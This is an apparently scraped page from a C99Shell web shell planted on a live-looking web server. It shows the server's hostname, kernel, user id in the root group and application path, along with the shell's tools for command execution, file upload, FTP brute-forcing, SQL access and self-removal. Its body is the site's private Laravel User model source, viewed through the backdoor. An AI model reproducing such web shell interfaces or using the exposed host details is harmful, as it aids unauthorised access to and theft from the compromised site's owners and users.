!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/picomail.picotech.app/public_html/app/Models/   drwxr-xr-x
Free 28.57 GB of 117.98 GB (24.22%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     User.php (2.29 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace App\Models;

use 
Illuminate\Contracts\Auth\MustVerifyEmail;
use 
Illuminate\Database\Eloquent\SoftDeletes;
use 
Illuminate\Foundation\Auth\User as Authenticatable;
use 
Illuminate\Notifications\Notifiable;

class 
User extends Authenticatable
{
    use 
Notifiable,SoftDeletes;

    
/**
     * The attributes that are mass assignable.
     *
     * @var array
     */
    
protected $fillable = [
        
'name''email''password',
    ];

    
/**
     * The attributes that should be hidden for arrays.
     *
     * @var array
     */
    
protected $hidden = [
        
'password''remember_token',
    ];

    
/**
     * The attributes that should be cast to native types.
     *
     * @var array
     */
    
protected $casts = [
        
'email_verified_at' => 'datetime',
    ];

    protected 
$dates=['created_at','updated_at'];

    public function 
customers(){
        return 
$this->hasMany(Customer::class,'admin_id');
    }

    public function 
number_requests(){
        return 
$this->hasMany(NumberRequest::class,'admin_id')->where('status','!=','accepted');
    }
    public function 
active_numbers(){
        return 
$this->hasMany(Number::class,'admin_id')->whereDoesntHave('requests')->where('numbers.status','active');
    }
    public function 
available_numbers(){
        return 
$this->active_numbers()->whereDoesntHave('customer_numbers');
    }
    public function 
plans(){
        return 
$this->hasMany(Plan::class,'admin_id');
    }
    public function 
taxs(){
        return 
$this->hasMany(Tax::class,'admin_id');
    }
    public function 
plan_requests(){
        return 
$this->hasMany(BillingRequest::class,'admin_id');
    }
    public function 
active_plans(){
        return 
$this->plans()->where('status','active');
    }
    public function 
settings(){
        return 
$this->hasMany(Settings::class,'admin_id');
    }
    public function 
pages(){
        return 
$this->hasMany(Page::class,'admin_id');
    }
    public function 
tickets(){
        return 
$this->hasMany(Ticket::class, 'admin_id''id');
    }
    public function 
sending_servers(){
        return 
$this->hasMany(SendingServer::class,'admin_id''id');
    }
    public function 
faqs(){
        return 
$this->hasMany(Faq::class, 'admin_id''id');
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0051 ]--